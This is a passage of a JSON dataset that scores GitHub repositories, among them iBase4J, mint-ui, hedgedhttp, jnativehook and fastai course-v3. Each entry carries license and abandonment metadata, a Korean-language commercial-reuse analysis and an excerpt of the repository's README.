1.8\")]()\r\n[![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu)\r\n[![LICENSE](https://img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE_CN)\r\n[![star](https://gitee.com/iBase4J/iBase4J/badge/star.svg?theme=dark)](https://gitee.com/iBase4J/iBase4J/stargazers)\r\n[![fork](https://gitee.com/iBase4J/iBase4J/badge/fork.svg?theme=dark)](https://gitee.com/iBase4J/iBase4J/members)\r\n\r\n## iBase4J项目简介\r\n\r\n- iBase4J是Java语言的分布式系统架构。 使用Spring整合开源框架。\r\n- 使用Maven对项目进行模块化管理，提高项目的易开发性、扩展性。\r\n- 系统包括4个子系统：系统管理Service、系统管理Web、业务Service、业务Web。\r\n- 系统管理：包括用户管理、权限管理、数据字典、系统参数管理等等。\r\n- 业务相关：您的业务开发。\r\n- 可以无限的扩展子系统，子系统之间使用Dubbo或MQ进行通信。\r\n\r\n## 主要功能\r\n 1. 数据库：Druid数据库连接池，监控数据库访问性能，统计SQL的执行性能。 数据库密码加密，加密方式请查看PropertiesUtil，decryptProperties属性配置需要解密的key。\r\n 2. 持久层：mybati","composite_score":0.441,"license_safety_tag":"safe"},{"name":"gadfly0x/signature_algorithm","github_url":"https://github.com/gadfly0x/signature_algorithm","stars":10,"language":"Python","license":"GPL-3.0","abandonment_months":55,"description":"","readme_excerpt":"## 简介\n各种App、小程序、网站的签名或加密算法。代码为Python3。逆向App用的都是iOS版本，可能与Android不同。\n\n如果你发现有趣的app、小程序、网站这里没有，可以提issue。\n\n\n\n## App列表\n起始版本：通常为逆向时使用的版本，更早的版本未做验证，不代表不可用，大家可自行验证。\n\n终止版本：算法可用的最后一个版本，由于版本更新会导致算法不可用，为空表示至最新版。\n\n- [x] **自如** \n    \n    起始版本：6.3.3\n    \n- [ ] **小红书** (只实现了sign算法，未实现shield算法)\n    \n    起始版本：6.0\n    \n- [x] **蛋壳公寓** \n    \n    起始版本：1.20.0\n\n- [ ] **luckin coffee(瑞幸咖啡)** (未实现sign算法)\n    \n    起始版本：2.8.5\n    \n    \n\n## 网站列表\n起始日期：算法通过验证的日期。\n\n终止日期：验证算法失效的日期，可能比真正失效的日期晚。\n\n- [x] **bangkokair(曼谷航空)** [详解](https://github.com/gadfly0x/signature_algorithm/wiki/bangkokair%E6%9B%BC%E8%B0%B7%E8%88%AA%E7%A9%BA)\n\n    起始版本：2019.12.07\n\n## 免责声明\n本项目所有内容仅供技术交流，请勿用于商业及非法用途，因此产生的任何法律纠纷均与本人无关。","composite_score":0.4405,"license_safety_tag":"restricted"},{"name":"WarpPrism/AutoPiano","github_url":"https://github.com/WarpPrism/AutoPiano","stars":20,"language":"JavaScript","license":"GPL-3.0","abandonment_months":42,"description":"","readme_excerpt":"# AutoPiano\n\n![GitHub](https://img.shields.io/github/license/autopiano/autopiano)\n\n![logo](https://user-images.githubusercontent.com/8694020/87133555-1afa1200-c2ca-11ea-92d4-c183cf35e4a4.png)\n\nhttps://www.autopiano.cn\n\nAutoPiano allows you to play a virtual piano online freely.\n\nIt's also an excellent music platform for all people.\n\n**This repo is only for Learning purpose.**\n\n**Not safe & suitable for deploying.**\n\n\n## Development\n\n- yarn install\n- yarn start\n","composite_score":0.4402,"license_safety_tag":"restricted"},{"name":"ElemeFE/mint-ui","github_url":"https://github.com/ElemeFE/mint-ui","stars":5,"language":"Vue","license":"mit","abandonment_months":52,"description":"# ElemeFE/mint-ui 분석 보고서\n\n## 왜 보물인가\n모바일 앱처럼 작동하는 웹사이트를 쉽게 만들 수 있는 디자인 도구 모음으로, 배달 앱으로 유명한 엘레미(Ele.me)에서 직접 개발하고 검증한 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **음식 배달 플랫폼**: 이 도구로 만든 배달 앱 UI를 다른 음식 배달 서비스에 판매할 수 있습","readme_excerpt":"# Mint UI\n\n[![Build Status](https://travis-ci.org/ElemeFE/mint-ui.svg?branch=master)](https://travis-ci.org/ElemeFE/mint-ui)\n[![npm](https://img.shields.io/npm/v/mint-ui.svg?maxAge=3600)](https://www.npmjs.com/package/mint-ui)\n[![NPM downloads](http://img.shields.io/npm/dm/mint-ui.svg)](https://npmjs.org/package/mint-ui)\n![JS gzip size](http://img.badgesize.io/elemefe/mint-ui/master/lib/index.js.svg?compression=gzip&label=gzip%20size:%20JS)\n![CSS gzip size](http://img.badgesize.io/elemefe/mint-ui/master/lib/style.css.svg?compression=gzip&label=gzip%20size:%20CSS)\n[![Join the chat at https://gitter.im/ElemeFE/mint-ui](https://badges.gitter.im/ElemeFE/mint-ui.svg)](https://gitter.im/ElemeFE/mint-ui?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n> Mobile UI elements for **Vue 2.0**\n\n- [Homepage](http://mint-ui.github.io)\n- [Documentation](http://mint-ui.github.io/docs)\n\n\n\n## Installation\n```shell\nnpm i mint-ui -S\n\n# for Vue 1.x\nnpm i mint-ui@1 -S\n```\n\n## Usage","composite_score":0.4401,"license_safety_tag":"safe"},{"name":"cristalhq/hedgedhttp","github_url":"https://github.com/cristalhq/hedgedhttp","stars":20,"language":"Go","license":"MIT","abandonment_months":22,"description":"# HedgedHTTP 분석 보고서\n\n## 왜 보물인가\n인터넷 연결이 끊겨도 서비스가 멈추지 않도록 자동으로 백업 경로를 찾아주는 기술로, 금융이나 의료처럼 시스템 중단이 치명적인 산업에서 필수입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 뱅킹 서비스**: 결제 중단 시 자동으로 다른 네트워크 경로를 통해 거래를 계속 처리\n- **클라우드 백업 서비스*","readme_excerpt":"# hedgedhttp\n\n[![build-img]][build-url]\n[![pkg-img]][pkg-url]\n[![reportcard-img]][reportcard-url]\n[![coverage-img]][coverage-url]\n[![version-img]][version-url]\n\nHedged HTTP client which helps to reduce tail latency at scale.\n\n## Rationale\n\nSee paper [Tail at Scale](https://www.barroso.org/publications/TheTailAtScale.pdf) by Jeffrey Dean, Luiz André Barroso. In short: the client first sends one request, but then sends an additional request after a timeout if the previous hasn't returned an answer in the expected time. The client cancels remaining requests once the first result is received.\n\n## Acknowledge\n\nThanks to [Bohdan Storozhuk](https://github.com/storozhukbm) for the review and powerful hints.\n\n## Features\n\n* Simple API.\n* Easy to integrate.\n* Optimized for speed.\n* Clean and tested code.\n* Supports `http.Client` and `http.RoundTripper`.\n* Dependency-free.\n\n## Install\n\nGo version 1.16+\n\n```\ngo get github.com/cristalhq/hedgedhttp\n```\n\n## Example\n\n```go\nctx := context.Background()\n","composite_score":0.4399,"license_safety_tag":"safe"},{"name":"Leonardpepa/Pepaverse","github_url":"https://github.com/Leonardpepa/Pepaverse","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":18,"description":"# Leonardpepa/Pepaverse 분석 보고서\n\n## 왜 보물인가\n최신 디지털 생태계를 구축하려는 프로젝트로, 미래 가상 공간 비즈니스의 기초 기술을 확보할 수 있는 기회입니다.\n\n## 어디에 쓸 수 있나\n1. **메타버스 플랫폼 SaaS**: 가상 세계 구축 및 관리 서비스로 게임사·엔터테인먼트 회사에 판매\n2. **웹3 기업 내부 도구**: N","readme_excerpt":"# Pepaverse \n\n# Pepaverse is a social network build with nodejs, mongoDB, passportjs and web sockets\n\n# it started as my first attempt to create a chat application but now has been evolved to my fist attempt creating my own social network to share with my friends\n\n# Use Cases ( that works for now )\n\n* Login-Register ( via email-password or google-auth20 )\n* Edit Profile ( profile picture url and description )\n* Send Friend Request\n* Accept Friend Request\n* Delete Friend Request\n* Create Post ( only text for now )\n* Delete Post\n* Delete Comment\n* Update Post\n* Update Comment\n* Like Post ( any users post )\n* Notifications (like, comment, friend request) in real time using web sockets\n* Search Users ( via name )\n* Logout\n\n# Soon to be implemented\n* Live Notifications (DONE!)\n* Private Chat\n\n# Local Installation\n\nyou need to add and configure an .env file as follows\n* PORT=< port number >\n* MONGO_DB_URL=< any mongodb url you prefer>\n* GOOGLE_CLIENT_ID=< your google id privided by google fo","composite_score":0.4398,"license_safety_tag":"safe"},{"name":"angular/angularfire2","github_url":"https://github.com/angular/angularfire2","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":6,"description":"# Angular Firebase 통합 라이브러리 분석\n\n## 왜 보물인가\nGoogle의 Firebase 데이터베이스와 Angular 웹 개발 환경을 쉽게 연결해주는 도구로, 기업들이 복잡한 실시간 데이터 관리 작업을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 협업 도구**: 여러 사용자가 동시에 문서를 수정하는 실시간 동기화 기능","readme_excerpt":"\n# AngularFire\n\nAngularFire smooths over the rough edges an Angular developer might encounter when implementing the framework-agnostic\n[Firebase JS SDK](https://github.com/firebase/firebase-js-sdk) & aims to provide a more natural developer experience\nby conforming to Angular conventions.\n\n<strong><pre>ng add @angular/fire</pre></strong>\n\n- **Dependency injection** - Provide and Inject Firebase services in your components.\n- **Zone.js wrappers** - Stable zones allow proper functionality of service workers, forms, SSR, and pre-rendering.\n- **Observable based** - Utilize RxJS rather than callbacks for real-time streams.\n- **NgRx friendly API** - Integrate with NgRx using AngularFire's action based APIs.\n- **Lazy-loading** - AngularFire dynamically imports much of Firebase, reducing the time to load your app.\n- **Deploy schematics** - Get your Angular application deployed on Firebase Hosting with a single command.\n- **Google Analytics** - Zero-effort Angular Router awareness in Google Ana","composite_score":0.4391,"license_safety_tag":"safe"},{"name":"kwhat/jnativehook","github_url":"https://github.com/kwhat/jnativehook","stars":6,"language":"Java","license":"NOASSERTION","abandonment_months":21,"description":"# kwhat/jnativehook 분석 보고서\n\n## 왜 보물인가\n컴퓨터의 키보드와 마우스 움직임을 프로그램 수준에서 감지하고 제어할 수 있는 기술로, 자동화 도구나 접근성 솔루션 개발의 핵심 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **자동화 업무 도구**: 반복적인 마우스 클릭이나 키보드 입력을 자동으로 수행하는 RPA(로봇 프로세스 자동화) ","readme_excerpt":"JNativeHook: Global keyboard and mouse listeners for Java.\n==========================================================\n\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.kwhat/jnativehook/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.github.kwhat/jnativehook)\n![Nightly Build](https://github.com/kwhat/jnativehook/workflows/Nightly%20Build/badge.svg)\n\n## About\nJNativeHook is a library to provide global keyboard and mouse listeners for Java.  This will allow you to listen for\nglobal shortcuts or mouse motion that would otherwise be impossible using pure Java.  To accomplish this task,\nJNativeHook leverages platform-dependent native code through Java's native interface to create low-level system-wide\nhooks and deliver those events to your application.\n\nThe following events are available via their respective listeners.\n* Key Press Events\n* Key Release Events\n* Key Typed Events\n* Mouse Down Events\n* Mouse Up Events\n* Mouse Click Events\n* Mouse Mo","composite_score":0.4389,"license_safety_tag":"unknown"},{"name":"ReactiveCocoa/ReactiveCocoa","github_url":"https://github.com/ReactiveCocoa/ReactiveCocoa","stars":7,"language":"Swift","license":"MIT","abandonment_months":9,"description":"# ReactiveCocoa 분석 보고서\n\n## 왜 보물인가\n애플 아이폰/맥 앱 개발자들이 복잡한 사용자 입력을 쉽게 처리할 수 있게 도와주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: iOS 기반 협업 앱(노션, 슬랙 같은)의 백엔드 로직 개발 가속화\n2. **내부 업무 도구**: 대기업의 iPhone용 사원 관리 앱이나 ","readme_excerpt":"<p align=\"center\">\n\t<a href=\"https://github.com/ReactiveCocoa/ReactiveCocoa/\"><img src=\"Logo/PNG/logo.png\" alt=\"ReactiveCocoa\" /></a><br /><br />\n\tReactive extensions to Cocoa frameworks, built on top of <a href=\"https://github.com/ReactiveCocoa/ReactiveSwift/\">ReactiveSwift</a>.<br /><br />\n\t<a href=\"http://reactivecocoa.io/slack/\"><img src=\"Logo/PNG/JoinSlack.png\" alt=\"Join the ReactiveSwift Slack community.\" width=\"143\" height=\"40\" /></a>\n</p>\n<br />\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](#carthage) [![CocoaPods compatible](https://img.shields.io/cocoapods/v/ReactiveCocoa.svg)](#cocoapods) [![SwiftPM compatible](https://img.shields.io/badge/SwiftPM-compatible-orange.svg)](#swift-package-manager) [![GitHub release](https://img.shields.io/github/release/ReactiveCocoa/ReactiveCocoa.svg)](https://github.com/ReactiveCocoa/ReactiveCocoa/releases) ![Swift 5.1](https://img.shields.io/badge/Swift-5.1-orange.svg) ![platforms](https://","composite_score":0.4389,"license_safety_tag":"safe"},{"name":"jobbole/awesome-programming-books","github_url":"https://github.com/jobbole/awesome-programming-books","stars":11,"language":"","license":"unknown","abandonment_months":58,"description":"# awesome-programming-books 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 사람들이 어떤 책을 읽어야 할지 한 곳에서 쉽게 찾을 수 있는 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 온라인 코딩 강의 사이트에서 \"추천 도서\" 섹션을 만들어 학생들에게 제공\n2. **출판사 큐레이션 서비스**: 프로그래밍 책 전","readme_excerpt":"# 经典编程书籍大全\n\n100+ 经典技术书籍，涵盖：计算机系统与网络、系统架构、算法与数据结构、前端开发、后端开发、移动开发、数据库、测试、项目与团队、程序员职业修炼、求职面试 和 编程相关的经典书籍。\n\n这个列表综合了伯乐在线网站以往推荐[经典书籍](http://blog.jobbole.com/tag/book/)文章中的列表，以及在微信和微博中被广泛推荐的好书。虽然已经包括了100多本，覆盖的面也比较全。仍然有很多方面需要补充，而且相信还有很多没有被收录的好书。欢迎大家在 issues 中推荐或自荐。\n\n## 计算机系统与网络\n\n*   《[图灵的秘密:他的生平、思想及论文解读](https://www.amazon.cn/gp/product/B00AAQXKXS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&amp;camp=536&amp;creative=3200&amp;creativeASIN=B00AAQXKXS&amp;linkCode=as2&amp;tag=vastwork-23)》\n*   《[计算机系统概论](https://www.amazon.cn/gp/product/B0011F9OQE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&amp;camp=536&amp;creative=3200&amp;creativeASIN=B0011F9OQE&amp;linkCode=as2&amp;tag=vastwork-23)》\n*   《[深入理解Linux内核](https://www.amazon.cn/gp/product/B0011F5RYM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&amp;camp=536&amp;creative=3200&amp;creativeASIN=B0011F5RYM&amp;linkCode=as2&amp;tag=vastwork-23)》\n*   《[深入Linux内核架构](https://www.amazon.cn/gp/product/B003QN7J7U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&amp;camp=536&amp;creative=3200&amp;cre","composite_score":0.4389,"license_safety_tag":"unknown"},{"name":"Bigkoo/Android-PickerView","github_url":"https://github.com/Bigkoo/Android-PickerView","stars":18,"language":"Java","license":"apache-2.0","abandonment_months":41,"description":"# Android-PickerView 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱에서 날짜, 시간, 선택지 등을 쉽게 입력받을 수 있는 UI 컴포넌트로, 개발자의 작업 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **배달/예약 앱 개발 서비스**: 날짜와 시간 선택 기능이 필요한 앱 개발 시 이 코드를 포함시켜 개발 비용 절감\n2. **기","readme_excerpt":"## 注意⚠️：已停止更新，原有版本jcenter库可以继续使用。建议直接下载源码引入 module 到自己项目改造。\n\n## Android-PickerView\n[![API](https://img.shields.io/badge/API-9%2B-brightgreen.svg)](https://android-arsenal.com/api?level=9) \n[![License](https://img.shields.io/badge/license-Apache%202-green.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Download](https://api.bintray.com/packages/contrarywind/maven/Android-PickerView/images/download.svg) ](https://bintray.com/contrarywind/maven/Android-PickerView/_latestVersion)\n\n[![GitHub stars](https://img.shields.io/github/stars/Bigkoo/Android-PickerView.svg?style=social)](https://github.com/Bigkoo/Android-PickerView/stargazers) [![GitHub forks](https://img.shields.io/github/forks/Bigkoo/Android-PickerView.svg?style=social)](https://github.com/Bigkoo/Android-PickerView/network) [![GitHub watchers](https://img.shields.io/github/watchers/Bigkoo/Android-PickerView.svg?style=social)](https://github.com/Bigkoo/Android-PickerView/watchers)\n\n### [English Document](https://github.com/Big","composite_score":0.4387,"license_safety_tag":"safe"},{"name":"fastai/course-v3","github_url":"https://github.com/fastai/course-v3","stars":7,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":24,"description":"# fastai/course-v3 상용화 분석\n\n## 왜 보물인가\n누구나 따라할 수 있는 인공지능 교육 커리큘럼으로, 수백만 명이 AI 기술을 배우고 싶어하는 시장에서 공식 학습 경로를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 월 구독형 AI 학습 플랫폼으로 동영상, 실습, 피드백을 자동 제공하는 서비스\n2. **기업 직원","readme_excerpt":"# course-v3\nThe 3rd edition Practical Deep Learning for Coders. See the `nbs` folder for the notebooks. You need to use [fastai1](https://github.com/fastai/fastai1) with these notebooks - the latest version of fastai will not work.\n\nNote that this repo is not the latest version of Part 1 of the course. For the latest version (which works correctly with the latest version of fastai), [click here](https://github.com/fastai/fastbook).\n","composite_score":0.4381,"license_safety_tag":"safe"},{"name":"lakshayg/tensorflow-build","github_url":"https://github.com/lakshayg/tensorflow-build","stars":5,"language":"","license":"Apache-2.0","abandonment_months":19,"description":"# tensorflow-build 저장소 분석\n\n## 왜 보물인가\n인공지능 학습에 필수적인 TensorFlow를 쉽게 설치하고 구성할 수 있도록 자동화한 도구로, 복잡한 설정 과정을 단순화하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 학습 플랫폼 SaaS**\n비전공자도 인공지능 모델을 만들 수 있는 웹 서비스에 내장하여, 복잡한 기술 설정 ","readme_excerpt":"This repository contains custom builds of tensorflow. To install\none of these on your system, download the correct file according\nto your version of python and gcc and run the following command.\n```\npip install --ignore-installed --upgrade /path/to/binary.whl --user\n```\nYou can also install directly from github using\n```bash\npip install --ignore-installed --upgrade \"Download URL\" --user\n```\n\nAll the binaries were compiled by passing `--config=opt` to bazel and setting\n`-O2 -Wno-sign-compare` in addition to the feature flags in configure script.\n\n**Latest Builds**\n\n| TF     | HW  | OS             | GCC                | Python   | NumPy  | Supports                        |                                                                                                                                                           |\n|--------|-----|----------------|--------------------|----------|--------|---------------------------------|--------------------------------------------------------","composite_score":0.438,"license_safety_tag":"safe"},{"name":"RainManGO/vue3-composition-admin","github_url":"https://github.com/RainManGO/vue3-composition-admin","stars":5,"language":"Vue","license":"MIT","abandonment_months":20,"description":"# vue3-composition-admin 분석\n\n## 왜 보물인가\n회사의 업무 관리 화면을 빠르게 만들 수 있는 기본 틀이 완성되어 있어서, 처음부터 만드는 것보다 훨씬 빠르고 저렴하게 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 직원 관리, 프로젝트 추적, 매출 현황 등을 보여주는 웹 기반 업무 도구로 고객사","readme_excerpt":"<p align=\"center\">\r\n  <a href=\"https://github.com/rcyj-FED/vue3-composition-admin-docs\" target=\"_blank\">\r\n    <img width=\"180\" src=\"https://github.com/rcyj-FED/vue3-composition-admin-docs/blob/main/docs/.vuepress/public/icons/android-chrome-192x192.png\" alt=\"logo\">\r\n  </a>\r\n</p>\r\n\r\n\r\n<p align=\"center\">\r\n  <a href=\"https://github.com/vuejs/vue\">\r\n    <img src=\"https://img.shields.io/badge/vue-3.0-brightgreen.svg\" alt=\"vue\">\r\n  </a>\r\n  <a href=\"https://github.com/element-plus/element-plus\">\r\n    <img src=\"https://img.shields.io/badge/element--plus-1.x-blue\" alt=\"element-plus\">\r\n  </a>\r\n  <a href=\"https://github.com/vuejs/vuex\">\r\n    <img src=\"https://img.shields.io/badge/vuex-4.0-brightgreen\" alt=\"vuex\">\r\n  </a>\r\n   <a href=\"https://github.com/intlify/vue-i18n-next\">\r\n    <img src=\"https://img.shields.io/badge/vue--i18n--next-9.0-brightgreen\" alt=\"vue-i18n-next\">\r\n   </a>\r\n   <a href=\"https://github.com/npm/npm\">\r\n    <img src=\"https://img.shields.io/badge/npm-6.1.8-blue\" alt=\"npm\">\r\n   ","composite_score":0.4376,"license_safety_tag":"safe"},{"name":"davedelong/Chronology","github_url":"https://github.com/davedelong/Chronology","stars":16,"language":"Swift","license":"MIT","abandonment_months":19,"description":"# Chronology 프로젝트 분석\n\n## 왜 보물인가\n복잡한 날짜와 시간 계산을 자동으로 처리해주는 도구로, 일상 앱과 비즈니스 소프트웨어에서 필수적인 기능을 깔끔하게 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 예약 관리 앱, 프로젝트 관리 도구, 급여 계산 시스템 등에 날짜 계산 기능 내장\n- **내부 업무 도구**: 회사 일","readme_excerpt":"# Time\n\n**Time** is a Swift package that makes it easy to perform robust and type-safe date and time calculations.\n\nWorking with calendars can be extremely complicated and error-prone. **Time** solves these problems by clarifying concepts and restricting improper usage through type-safe APIs.\n\n## Installing\n\n**Time** can be installed like any other Swift package. Add this to the `dependencies` section of your Package.swift:\n\n```swift\n.package(url: \"https://github.com/davedelong/time\", from: \"1.0.0\")\n```\n\n## Platform Support\n\n**Time** requires Swift 5.7 or later, as well as macOS 13/iOS 16 (or equivalent) or later. Core parts of the library are built on Swift's `Duration` type, which was introduced in macOS 13/iOS 16.\n\n## Documentation\n\n**Time**'s extensive documentation is hosted at the [Swift Package Index][spi].\n\nAdditionally, an \"Examples\" folder in this repository contains code illustrating how to use core parts of the library.\n\n## The Basics\n\nHere's the TL;DR of the documentation:","composite_score":0.4375,"license_safety_tag":"safe"},{"name":"amfe/lib-flexible","github_url":"https://github.com/amfe/lib-flexible","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":33,"description":"# amfe/lib-flexible 분석 보고서\n\n## 왜 보물인가\n휴대폰 화면 크기가 다양한 상황에서 웹사이트가 자동으로 크기를 조정하도록 하는 핵심 기술로, 모바일 앱 개발사들이 필수적으로 사용합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 반응형 웹 빌더 플랫폼에서 사용자들이 다양한 기기에 맞는 페이지를 쉽게 만들 수 있도록 지원\n2","readme_excerpt":"# amfe-flexible\n\n[Classic edition (0.3.2)](https://github.com/amfe/lib-flexible/tree/master)\n\n> 由于`viewport`单位得到众多浏览器的兼容，`lib-flexible`这个过渡方案已经可以放弃使用，不管是现在的版本还是以前的版本，都存有一定的问题。建议大家开始使用`viewport`来替代此方。\n## Usage\n\n#### Install\n\n`npm i -S amfe-flexible`\n\n#### Import\n\n```html\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no\">\n<script src=\"./node_modules/amfe-flexible/index.js\"></script>\n```\n\nYou can inline this file with [inline-source](https://npmjs.org/package/inline-source).\n\n#### Develop\n\nUse [postcss-adaptive](https://www.npmjs.com/package/postcss-adaptive).\n\n## License\n\n(The MIT License)\n\nCopyright (c) 2016 Alibaba MFE\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or s","composite_score":0.4368,"license_safety_tag":"unknown"},{"name":"fossasia/phimpme-android","github_url":"https://github.com/fossasia/phimpme-android","stars":11,"language":"Java","license":"GPL-3.0","abandonment_months":39,"description":"# Phimpme Android 저장소 분석\n\n## 왜 보물인가\n누구나 자신의 스마트폰에서 사진을 깔끔하게 정리하고 공유할 수 있는 무료 사진 앱으로, 기술에 강하지 않은 사람도 쉽게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 사진 공유 SaaS 서비스**\n클라우드 저장소와 연결하여 가족, 친구들과 안전하게 사진을 공유하는 구독 서비스로 운","readme_excerpt":"<img height='175' src=\"./docs/images/logo.png\" align=\"left\" hspace=\"1\" vspace=\"1\">\n\n<a href='https://play.google.com/store/apps/details?id=org.fossasia.phimpme'><img align='right' height='46' src='./docs/images/google_play_badge.png'></a>\n\n# Phimp.me Android\n\n<a href='https://phimp.me'>Phimp.me</a> is an Android image editor app that aims to replace proprietary photographing and image apps on smart phones. It offers features such as taking photos, adding filters, editing images and uploading them to social networks. Phimp.me stands for **Ph**otos - **Im**ages - **P**ictures. It is developed at <a href='https://fossasia.org'>FOSSASIA</a> together with a global community.\n\n\n| Master | Development | Codecov | Code Quality | Chat | Twitter |\n|------------|-----------------|-------------|-----------------|-----------------|-----------------|\n| [![Build Status](https://travis-ci.com/fossasia/phimpme-android.svg?branch=master)](https://travis-ci.com/fossasia/phimpme-android) | [![Build Status","composite_score":0.4366,"license_safety_tag":"restricted"},{"name":"shadowsocks/shadowsocks-iOS","github_url":"https://github.com/shadowsocks/shadowsocks-iOS","stars":5,"language":"Objective-C","license":"unknown","abandonment_months":49,"description":"# shadowsocks-iOS 프로젝트 분석\n\n## 왜 보물인가\n인터넷 연결을 보안성 있게 보호해주는 기술로, 개인정보 유출을 걱정하는 사용자들이 꾸준히 찾는 수요가 있는 분야입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 보안 VPN 구독 서비스로 월별 이용료를 받는 방식\n2. **내부 업무 도구**: 기업의 직원들이 안전하게 회사 시","readme_excerpt":"Removed according to regulations.\n","composite_score":0.4365,"license_safety_tag":"unknown"},{"name":"chai2010/go-ast-book","github_url":"https://github.com/chai2010/go-ast-book","stars":7,"language":"Go","license":"unknown","abandonment_months":20,"description":"# chai2010/go-ast-book 분석 보고서\n\n## 왜 보물인가\n프로그래밍 언어의 구조를 읽고 분석하는 방법을 체계적으로 설명한 교과서로, 소프트웨어 개발 도구를 만드는 사람들에게 필수적인 지식을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **코드 품질 검사 SaaS**: 기업의 소스 코드를 자동으로 분석해 버그나 보안 문제를 찾아주는 온라인 서","readme_excerpt":"# 《Go语言定制指南》（原名：Go语法树入门）\n\n- *凹语言(专为 WebAssembly 设计): https://github.com/wa-lang/wa*\n- *WaBook(Go语言实现的MD电子书构建工具): https://github.com/wa-lang/wabook*\n\n----\n\nGo语法树是Go语言源文件的另一种语义等价的表现形式。而Go语言自带的`go fmt`和`go doc`等命令都是在Go语法树的基础之上分析工具。因此将Go语言程序作为输入数据，让我们语法树这个维度重新审视Go语言程序，我们将得到创建Go语言本身的技术。Go语法树由标准库的`go/ast`包定义，它是在`go/token`包定义的词法基础之上抽象的语法树结构。本书简单介绍语法树相关包的使用。如果想从头实现一个玩具Go语言可以参考[《从头实现µGo语言》](https://github.com/chai2010/ugo-compiler-book)。\n\n![](cover.jpg)\n\n- 作者：柴树杉，Github [@chai2010](https://github.com/chai2010)，Twitter [@chaishushan](https://twitter.com/chaishushan)\n- 作者：史斌，Github [@benshi001](https://github.com/benshi001)\n- 作者：丁尔男，Github [@3dgen](https://github.com/3dgen)\n- 主页：https://github.com/chai2010/go-ast-book\n- 阅读：https://chai2010.cn/go-ast-book\n\n\n## 购买链接：\n\n- 京东：https://item.jd.com/13698866.html\n- 当当：https://product.dangdang.com/29388202.html\n- 异步：https://www.epubit.com/bookDetails?id=UBc86f749c1eb7\n\n如果你喜欢本书，欢迎到豆瓣评论：\n\n- https://book.douban.com/subject/35852237\n\n# waBook 构建(纯Go语言实现)\n\n增加了基","composite_score":0.4359,"license_safety_tag":"unknown"},{"name":"ZheC/Realtime_Multi-Person_Pose_Estimation","github_url":"https://github.com/ZheC/Realtime_Multi-Person_Pose_Estimation","stars":6,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":75,"description":"# Realtime_Multi-Person_Pose_Estimation 분석\n\n## 왜 보물인가\n여러 사람의 몸 움직임을 실시간으로 인식하는 기술로, 스포츠 분석부터 안전 감시까지 다양한 산업에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **피트니스 SaaS**: 운동 자세를 자동으로 분석해주는 AI 트레이너 앱\n- **공장 안전 도구**: ","readme_excerpt":"# Realtime Multi-Person Pose Estimation\nBy [Zhe Cao](https://people.eecs.berkeley.edu/~zhecao/), [Tomas Simon](http://www.cs.cmu.edu/~tsimon/), [Shih-En Wei](https://scholar.google.com/citations?user=sFQD3k4AAAAJ&hl=en), [Yaser Sheikh](http://www.cs.cmu.edu/~yaser/).\n\n## Introduction\nCode repo for winning 2016 MSCOCO Keypoints Challenge, 2016 ECCV Best Demo Award, and 2017 CVPR Oral paper.  \n\nWatch our video result in [YouTube](https://www.youtube.com/watch?v=pW6nZXeWlGM&t=77s) or [our website](http://posefs1.perception.cs.cmu.edu/Users/ZheCao/humanpose.mp4). \n\nWe present a bottom-up approach for realtime multi-person pose estimation, without using any person detector. For more details, refer to our [CVPR'17 paper](https://arxiv.org/abs/1611.08050), our [oral presentation video recording](https://www.youtube.com/watch?v=OgQLDEAjAZ8&list=PLvsYSxrlO0Cl4J_fgMhj2ElVmGR5UWKpB) at CVPR 2017 or our [presentation slides](http://image-net.org/challenges/talks/2016/Multi-person%20pose%20estimati","composite_score":0.4358,"license_safety_tag":"unknown"},{"name":"fossasia/chat.susi.ai","github_url":"https://github.com/fossasia/chat.susi.ai","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":37,"description":"# fossasia/chat.susi.ai 보물 분석\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 AI 챗봇을 직접 만들고 운영할 수 있는 오픈소스 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자신의 웹사이트에 붙일 수 있는 고객 상담 챗봇을 월 구독료로 제공\n2. **내부 업무 도구**: 회사 직원들이 업무 질문을 ","readme_excerpt":"<p align=\"center\">\n  <img 